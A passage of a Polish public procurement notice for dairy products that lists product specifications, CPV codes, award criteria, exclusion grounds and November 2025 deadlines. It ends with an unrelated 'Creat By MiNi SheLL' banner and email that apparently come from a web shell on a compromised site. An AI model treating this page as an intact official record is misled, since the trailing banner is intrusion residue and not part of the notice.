pleśniowy, różne smaki, opak. 120- 300g wartość odżywcza w 100g: tłuszcz min. 31g węglowodany w tym cukry max. 0,05g, białko min. 18g, sól max. 1,7g	1600	szt<br/>23	jogurt typu jogobella musli, różne smaki, opak. 200g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 3,1g, białko min. 3,8g, węglowodany min. 13,2g, 1800	szt<br/>24	deser typu smakija kaszka, różne smaki, opak 130g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: mleko pełne min. 59%, kaszka manna z pszenicy min. 5,6%	800	szt<br/>25	deser typu łaciaty z maślanką, różne smaki, opak. 170g wartość odżywcza w 100g: tłuszcz min. 6g węglowodany w tym cukry max. 14g, białko min.3,8g, sól max.0,1g,wapń min.120mg.	1000	szt<br/>26	serek topiony typu mlekpol, różne smaki, opak. 100g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min.28g, białko min.10g, węglowodany min.1,2g,max cukry 1,2g,max sól 1,7g. 3000	szt<br/>27	deser typu poezja polmlek, różne smaki, opak 180g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g:tłuszcz min.4,9g, węglowodany min.17g,cukry max.14g, białko min.3,40g, sól max.0,16g.	2000	szt<br/>26	jogurt typu kremowy finezja różne smaki, opak. 130g wartość odżywcza w 100g: tłuszcz min. 7g węglowodany min.12g, w tym cukry max. 11,5g, białko min.3,3g, sól max.0,12g.	1000	szt<br/>27	jogurt typu islandzkiego skyr, różne smaki, opak. 150g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz 0g, białko min.9,6g, węglowodany min.11g,max cukry 11g, sól max 0,06g. <br/>	1000	szt </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15551320-4 - Jogurt z dodatkiem substancji smakowych</p> <p class="mb-0">15540000-5 - Produkty serowarskie</p> <p class="mb-0">15542200-1 - Ser miękki</p> <p class="mb-0">15833100-7 - Desery</p> <p class="mb-0">15543100-7 - Ser z przerostami pleśni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Jest to zamówienie cykliczne, powtarzane przez Zamawiającego rok-rocznie. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione wyżej kryterium. Najkorzystniejszą ofertą będzie oferta, która przedstawia najkorzystniejszy bilans ceny i czasu dostaw interwencyjnych odnoszących się do przedmiotu zamówienia zawartych w formularzu ofertowym (załącznik nr 1 do SWZ) oraz wykazach asortymentu (załącznikach nr 5 i 6).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy zamówień interwencyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Zamawiający odstępuje od wymagania podmiotowych środków dowodowych w zakresie niepodlegania wykluczeniu z postępowania oraz spełnienia warunków udziału w postępowaniu. Zamawiający dokona oceny braku podstaw wykluczenia z postępowania oraz warunków udziału <br/>w postępowaniu na podstawie oświadczenia o którym mowa w art. 125 ust. 1 ustawy Pzp,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1	Dokument potwierdzający stosowanie systemu HACCP (Podstawa prawna: art. 59, 59a i 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia Dz. U. z 2023 r. poz. 1448 z późn. zm.)	Dokumentem tym może być jeden <br/>z niżej wymienionych:<br/>- certyfikat HACCP,<br/>- certyfikat wydany przez firmy posiadające akredytację <br/>i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie oraz krajowej organizacji akredytacyjnej dla danego kraju,<br/>- zaświadczenie wydane przez właściwego terytorialnie Powiatowego Inspektora Państwowej Inspekcji Sanitarnej lub Inspekcji Weterynaryjnej,<br/>- oświadczenie Wykonawcy.<br/>Wymagany oryginał dokumentu lub kopia potwierdzona za zgodność <br/>z oryginałem. <br/>W przypadku, gdy dokument został wystawiony w postaci papierowej <br/>i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu, opatrzone podpisem elektronicznym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>2	Wykaz samochodów posiadających decyzję<br/>właściwego organu dopuszczającego pojazdy do przewozu żywności.	Wymagany oryginał dokumentu lub kopia potwierdzona za zgodność <br/>z oryginałem.<br/>Wymagany oryginał dokumentu lub kopia potwierdzona za zgodność <br/>z oryginałem. <br/>W przypadku, gdy dokument został wystawiony w postaci papierowej <br/>i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu, podpisem elektronicznym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 2.	Na podstawie art. 107 ust. 2 jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych wraz z ofertą lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.	W przypadku Wykonawców składających ofertę wspólną, stosowne oświadczenia z art. 125 ust. 1 ustawy Pzp., składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4.	W sytuacji, gdy Wykonawca polega na zdolności lub sytuacji innego podmiotu na zasadach określonych w art. 118 ustawy Pzp, Wykonawca jest zobowiązany złożyć stosowne dokumenty <br/>i oświadczenia z art. 125 ust. 1 ustawy Pzp., także w odniesieniu do tego innego podmiotu.<br/>4.1	Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt. 3, potwierdza, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: <br/>1)	zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby; <br/>2)	sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; <br/>3)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>4. W przypadku gdy Wykonawca dla potwierdzenia spełnienia warunków udziału w postępowaniu załącza dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na złoty polski. Do przeliczenia zostanie zastosowany średni kurs walut NBP obowiązujący w dniu zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. W przypadku braku publikacji kursów walut NBP w dniu, o którym mowa powyżej, zastosowanie ma kurs ostatnio ogłoszony, przed ww. dniem zgodnie z treścią § 8 pkt 5 Uchwały nr 51/2002 Zarządu Narodowego Banku Polskiego z dnia 23 września 2002 roku, w sprawie sposobu wyliczania i ogłaszania bieżących kursów walu obcych (Dz. Urz. NBP z 2023 r., poz. 1). <br/>5. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego lub spółek cywilnych, Zamawiający wymaga złożenia do oferty oświadczenia na podstawie art. 117 ust 4 ustawy Pzp dotyczącego podziału prac przy realizacji niniejszego zamówienia. <br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego lub spółek cywilnych w zakresie udostępniania zasobów podmiotu trzeciego, (rb, u), Zamawiający informuje, że podmiot trzeci obligatoryjnie musi być podwykonawcą w zakresie w jakim udostępnia swoje zasoby w celu spełniania warunków udziału w postępowaniu. Zamawiający żąda jednocześnie złożenia oświadczenia na podstawie art. 125 ust. 1 ustawy Pzp przez podmiot trzeci. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określone są w załączniku nr 4 do SWZ - Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-18 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca przygotowuje ofertę w oparciu o wzór „Formularza ofertowego” udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-18 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com